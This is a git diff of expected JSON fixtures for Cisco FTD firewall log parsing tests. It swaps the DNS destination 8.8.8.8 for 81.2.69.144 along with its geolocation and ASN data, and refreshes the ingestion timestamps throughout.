+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -2612,7 +2663,7 @@
 "dns_query": "elastic.co",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "8.8.8.8",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "udp",
@@ -2653,24 +2704,27 @@
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 221,
- "ip": "8.8.8.8",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -2718,7 +2772,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -2727,8 +2781,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-09-07T12:21:56.350984400Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599",
+ "ingested": "2021-12-09T13:35:02.913053300Z",
+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -2758,7 +2812,7 @@
 "dns_query": "elastic.co",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "8.8.8.8",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "udp",
@@ -2798,24 +2852,27 @@
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 131,
- "ip": "8.8.8.8",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -2863,7 +2920,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -2872,8 +2929,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-09-07T12:21:56.350987100Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 46093, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 131, NAPPolicy: Balanced Security and Connectivity, DNSRecordType: a domain name pointer, DNS_TTL: 59",
+ "ingested": "2021-12-09T13:35:02.913058Z",
+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46093, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 131, NAPPolicy: Balanced Security and Connectivity, DNSRecordType: a domain name pointer, DNS_TTL: 59",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -2906,7 +2963,7 @@
 "prefilter_policy": "Default Prefilter Policy",
 "nap_policy": "Balanced Security and Connectivity",
 "ingress_zone": "input-zone",
- "dst_ip": "8.8.8.8",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_port": "46093",
 "src_ip": "10.0.1.20",
@@ -2943,24 +3000,27 @@
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 722,
- "ip": "8.8.8.8",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -3008,7 +3068,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -3017,8 +3077,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-09-07T12:21:56.350989500Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299",
+ "ingested": "2021-12-09T13:35:02.913064400Z",
+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -3049,7 +3109,7 @@
 "dns_query": "elastic.co",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "8.8.8.8",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "udp",
diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json
index 41acde1f765..4253c442cad 100644
--- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json
+++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json
@@ -31,7 +31,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.328928600Z",
+ "ingested": "2021-12-09T13:35:07.406347800Z",
 "original": "Jan 1 2019 01:00:27 beats asa[1234]: %FTD-7-999999: This message is not filtered.",
 "code": "999999",
 "kind": "event",
@@ -72,7 +72,7 @@
 },
 "event": {
 "severity": 8,
- "ingested": "2021-09-07T12:21:59.328938100Z",
+ "ingested": "2021-12-09T13:35:07.406356100Z",
 "original": "Jan 1 2019 01:00:30 beats asa[1234]: %FTD-8-999999: This phony message is dropped due to log level.",
 "code": "999999",
 "kind": "event",
diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-firepower-management.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-firepower-management.log-expected.json
index edc54add973..01f60058c6a 100644
--- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-firepower-management.log-expected.json
+++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-firepower-management.log-expected.json
@@ -29,7 +29,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441041500Z",
+ "ingested": "2021-12-09T13:35:07.581578300Z",
 "original": "\u003c14\u003eAug 14 2019 13:56:30 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=AuditLog, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -66,7 +66,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441051800Z",
+ "ingested": "2021-12-09T13:35:07.581586900Z",
 "original": "\u003c14\u003eAug 14 2019 13:57:19 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=Banner, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -103,7 +103,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441054Z",
+ "ingested": "2021-12-09T13:35:07.581591600Z",
 "original": "\u003c14\u003eAug 14 2019 13:57:26 ChangeReconciliation.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/ChangeReconciliation.cgi, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -140,7 +140,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441056800Z",
+ "ingested": "2021-12-09T13:35:07.581595700Z",
 "original": "\u003c14\u003eAug 14 2019 13:57:34 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=IntrusionPolicyPrefs, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -177,7 +177,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441058800Z",
+ "ingested": "2021-12-09T13:35:07.581600100Z",
 "original": "\u003c14\u003eAug 14 2019 13:57:43 lights_out_mgmt.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /admin/lights_out_mgmt.cgi, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -214,7 +214,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441080100Z",
+ "ingested": "2021-12-09T13:35:07.581604700Z",
 "original": "\u003c14\u003eAug 14 2019 13:58:02 mojo_server.pl: siem-management: admin@10.0.255.31, Cloud Services, View url filtering settings\u0000x0a\u0000x00",
 "code": ""
 },
@@ -251,7 +251,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441084200Z",
+ "ingested": "2021-12-09T13:35:07.581609600Z",
 "original": "\u003c14\u003eAug 14 2019 13:58:02 mojo_server.pl: siem-management: admin@10.0.255.31, Cloud Services, View amp settings\u0000x0a\u0000x00",
 "code": ""
 },
@@ -288,7 +288,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441086400Z",
+ "ingested": "2021-12-09T13:35:07.581615400Z",
 "original": "\u003c14\u003eAug 14 2019 13:58:20 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Monitoring \u003e Syslog, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -325,7 +325,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441088200Z",
+ "ingested": "2021-12-09T13:35:07.581621Z",
 "original": "\u003c14\u003eAug 14 2019 13:58:41 mojo_server.pl: siem-management: admin@10.0.255.31, Devices \u003e Device Management, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -362,7 +362,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441090100Z",
+ "ingested": "2021-12-09T13:35:07.581626600Z",
 "original": "\u003c14\u003eAug 14 2019 13:58:47 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Device Management \u003e NGFW Interfaces, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -399,7 +399,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441091900Z",
+ "ingested": "2021-12-09T13:35:07.581632200Z",
 "original": "\u003c14\u003eAug 14 2019 13:58:52 mojo_server.pl: siem-management: admin@10.0.255.31, Devices \u003e Device Management \u003e NGFW Device Summary, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -436,7 +436,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441093900Z",
+ "ingested": "2021-12-09T13:35:07.581638200Z",
 "original": "\u003c14\u003eAug 14 2019 13:58:54 mojo_server.pl: siem-management: admin@10.0.255.31, Devices \u003e Device Management \u003e NGFW Device Summary, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -473,7 +473,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441095700Z",
+ "ingested": "2021-12-09T13:35:07.581643900Z",
 "original": "\u003c14\u003eAug 14 2019 13:59:10 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -510,7 +510,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441097500Z",
+ "ingested": "2021-12-09T13:35:07.581649600Z",
 "original": "\u003c14\u003eAug 14 2019 13:59:15 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -547,7 +547,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441099400Z",
+ "ingested": "2021-12-09T13:35:07.581655100Z",
 "original": "\u003c14\u003eAug 14 2019 14:00:37 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Save Policy ftd-policy\u0000x0a\u0000x00",
 "code": ""
 },
@@ -584,7 +584,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441101100Z",
+ "ingested": "2021-12-09T13:35:07.581660800Z",
 "original": "\u003c14\u003eAug 14 2019 14:00:37 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Modified: Syslog\u0000x0a\u0000x00",
 "code": ""
 },
@@ -621,7 +621,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441103Z",
+ "ingested": "2021-12-09T13:35:07.581666600Z",
 "original": "\u003c14\u003eAug 14 2019 14:00:37 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -658,7 +658,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441105300Z",
+ "ingested": "2021-12-09T13:35:07.581675100Z",
 "original": "\u003c14\u003eAug 14 2019 14:01:12 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Save Policy ftd-policy\u0000x0a\u0000x00",
 "code": ""
 },
@@ -695,7 +695,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441107Z",
+ "ingested": "2021-12-09T13:35:07.581679900Z",
 "original": "\u003c14\u003eAug 14 2019 14:01:12 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Modified: Syslog\u0000x0a\u0000x00",
 "code": ""
 },
@@ -732,7 +732,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441108800Z",
+ "ingested": "2021-12-09T13:35:07.581685800Z",
 "original": "\u003c14\u003eAug 14 2019 14:01:13 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -769,7 +769,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441110500Z",
+ "ingested": "2021-12-09T13:35:07.581690800Z",
 "original": "\u003c14\u003eAug 14 2019 14:01:20 sfdccsm: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00",
 "code": ""
 },
@@ -806,7 +806,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441112200Z",
+ "ingested": "2021-12-09T13:35:07.581694800Z",
 "original": "\u003c14\u003eAug 14 2019 14:01:31 ActionQueueScrape.pl: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00",
 "code": ""
 },
@@ -843,7 +843,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441114Z",
+ "ingested": "2021-12-09T13:35:07.581699100Z",
 "original": "\u003c14\u003eAug 14 2019 14:01:31 ActionQueueScrape.pl: siem-management: admin@localhost, Task Queue, Successful task completion : Pre-deploy Global Configuration Generation\u0000x0a\u0000x00",
 "code": ""
 },
@@ -880,7 +880,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441115900Z",
+ "ingested": "2021-12-09T13:35:07.581702900Z",
 "original": "\u003c14\u003eAug 14 2019 14:01:35 ActionQueueScrape.pl: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00",
 "code": ""
 },
@@ -917,7 +917,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441117700Z",
+ "ingested": "2021-12-09T13:35:07.581707700Z",
 "original": "\u003c14\u003eAug 14 2019 14:01:36 ActionQueueScrape.pl: siem-management: admin@localhost, Task Queue, Successful task completion : Pre-deploy Device Configuration for siem-ftd\u0000x0a\u0000x00",
 "code": ""
 },
@@ -954,7 +954,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441119400Z",
+ "ingested": "2021-12-09T13:35:07.581713400Z",
 "original": "\u003c14\u003eAug 14 2019 14:01:55 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -991,7 +991,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441121100Z",
+ "ingested": "2021-12-09T13:35:07.581719Z",
 "original": "\u003c14\u003eAug 14 2019 14:01:56 sfdccsm: siem-management: admin@localhost, Task Queue, Policy Deployment to siem-ftd - SUCCESS\u0000x0a\u0000x00",
 "code": ""
 },
@@ -1028,7 +1028,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441122800Z",
+ "ingested": "2021-12-09T13:35:07.581724600Z",
 "original": "\u003c14\u003eAug 14 2019 14:01:57 sfdccsm: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00",
 "code": ""
 },
@@ -1065,7 +1065,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441124600Z",
+ "ingested": "2021-12-09T13:35:07.581730100Z",
 "original": "\u003c14\u003eAug 14 2019 14:02:03 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Monitoring \u003e Syslog, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -1102,7 +1102,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441126300Z",
+ "ingested": "2021-12-09T13:35:07.581735800Z",
 "original": "\u003c14\u003eAug 14 2019 14:02:11 index.cgi: siem-management: admin@10.0.255.31, System \u003e Monitoring \u003e Audit, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -1139,7 +1139,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441128100Z",
+ "ingested": "2021-12-09T13:35:07.581757800Z",
 "original": "\u003c14\u003eAug 14 2019 14:02:19 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -1176,7 +1176,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441146300Z",
+ "ingested": "2021-12-09T13:35:07.581763300Z",
 "original": "\u003c14\u003eAug 14 2019 14:02:31 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=AuditLog, Page View\u0000x0a\u0000x00",
 "code": ""
 },
@@ -1213,7 +1213,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441148900Z",
+ "ingested": "2021-12-09T13:35:07.581768600Z",
 "original": "\u003c14\u003eAug 14 2019 14:02:38 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Local System Configuration, Save Local System Configuration\u0000x0a\u0000x00",
 "code": ""
 },
@@ -1251,7 +1251,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:21:59.441150700Z",
+ "ingested": "2021-12-09T13:35:07.581774Z",
 "original": "\u003c14.2\u003eAug 14 2019 14:02:38 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Audit Log Settings \u003e Modified: Send Audit Log to Syslog enabled \u003e Disabled",
 "code": ""
 },
diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-intrusion.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-intrusion.log-expected.json
index a6f900e6a7f..6890093aabc 100644
--- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-intrusion.log-expected.json
+++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-intrusion.log-expected.json
@@ -64,7 +64,7 @@
 },
 "event": {
 "severity": 0,
- "ingested": "2021-09-07T12:22:00.700724200Z",
+ "ingested": "2021-12-09T13:35:09.413139500Z",
 "original": "2019-08-16T09:54:00Z firepower %FTD-0-430001: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55644, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, Priority: 1, GID: 1, SID: 17279, Revision: 12, Message: SERVER-WEBAPP Ipswitch WhatsUp Small Business directory traversal attempt, Classification: Attempted User Privilege Gain, User: No Authentication Required, Client: Firefox, ApplicationProtocol: HTTP, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity",
 "code": "430001",
 "kind": "alert",
@@ -178,7 +178,7 @@
 },
 "event": {
 "severity": 0,
- "ingested": "2021-09-07T12:22:00.700733Z",
+ "ingested": "2021-12-09T13:35:09.413148400Z",
 "original": "2019-08-16T09:57:02Z firepower %FTD-0-430001: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55868, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, Priority: 1, GID: 1, SID: 17279, Revision: 12, Message: SERVER-WEBAPP Ipswitch WhatsUp Small Business directory traversal attempt, Classification: Attempted User Privilege Gain, User: No Authentication Required, Client: Firefox, ApplicationProtocol: HTTP, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity",
 "code": "430001",
 "kind": "alert",
@@ -290,7 +290,7 @@
 },
 "event": {
 "severity": 0,
- "ingested": "2021-09-07T12:22:00.700735200Z",
+ "ingested": "2021-12-09T13:35:09.413154500Z",
 "original": "2019-08-16T10:04:44Z firepower %FTD-0-430001: SrcIP: 10.0.100.30, DstIP: 10.0.1.20, SrcPort: 21, DstPort: 39114, Protocol: tcp, IngressInterface: outside, EgressInterface: inside, IngressZone: output-zone, EgressZone: input-zone, Priority: 3, GID: 1, SID: 13360, Revision: 6, Message: APP-DETECT failed FTP login attempt, Classification: Misc Activity, User: No Authentication Required, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity",
 "code": "430001",
 "kind": "alert",
@@ -400,7 +400,7 @@
 },
 "event": {
 "severity": 0,
- "ingested": "2021-09-07T12:22:00.700737Z",
+ "ingested": "2021-12-09T13:35:09.413158900Z",
 "original": "2019-08-16T10:09:47Z firepower %FTD-0-430001: SrcIP: 10.0.100.30, DstIP: 10.0.1.20, SrcPort: 21, DstPort: 40740, Protocol: 6, IngressInterface: outside, EgressInterface: inside, IngressZone: output-zone, EgressZone: input-zone, Priority: 3, GID: 1, SID: 13360, Revision: 6, Message: APP-DETECT failed FTP login attempt, Classification: Misc Activity, User: No Authentication Required, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity",
 "code": "430001",
 "kind": "alert",
diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-no-type-id.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-no-type-id.log-expected.json
index 69f205a30bb..afa0d5ae42a 100644
--- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-no-type-id.log-expected.json
+++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-no-type-id.log-expected.json
@@ -48,7 +48,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:22:01.204979900Z",
+ "ingested": "2021-12-09T13:35:10.150747700Z",
 "original": "Jan 11 2018 01:00:27 beats ftd[1234]: ApplicationProtocol: http, Client: webserver, DstIP: 10.8.12.47, SrcIP: 10.1.123.45, Message: Intrusion attempt",
 "code": "430001",
 "kind": "alert",
@@ -109,7 +109,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:22:01.204988Z",
+ "ingested": "2021-12-09T13:35:10.150757400Z",
 "original": "Jan 11 2018 01:00:27 beats ftd[1234]: HTTPResponse: 404, Message: Some message here (1:36330:2).",
 "code": "430001",
 "kind": "alert",
@@ -167,7 +167,7 @@
 },
 "event": {
 "severity": 7,
- "ingested": "2021-09-07T12:22:01.204990200Z",
+ "ingested": "2021-12-09T13:35:10.150763900Z",
 "original": "Jan 11 2018 01:00:27 beats ftd[1234]: HTTPResponse: 404, Message: Some message here (1:36330:2), Empty: ,FileCount:, IngressZone:",
 "code": "430002",
 "kind": "event",
@@ -243,7 +243,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-09-07T12:22:01.204992Z",
+ "ingested": "2021-12-09T13:35:10.150770Z",
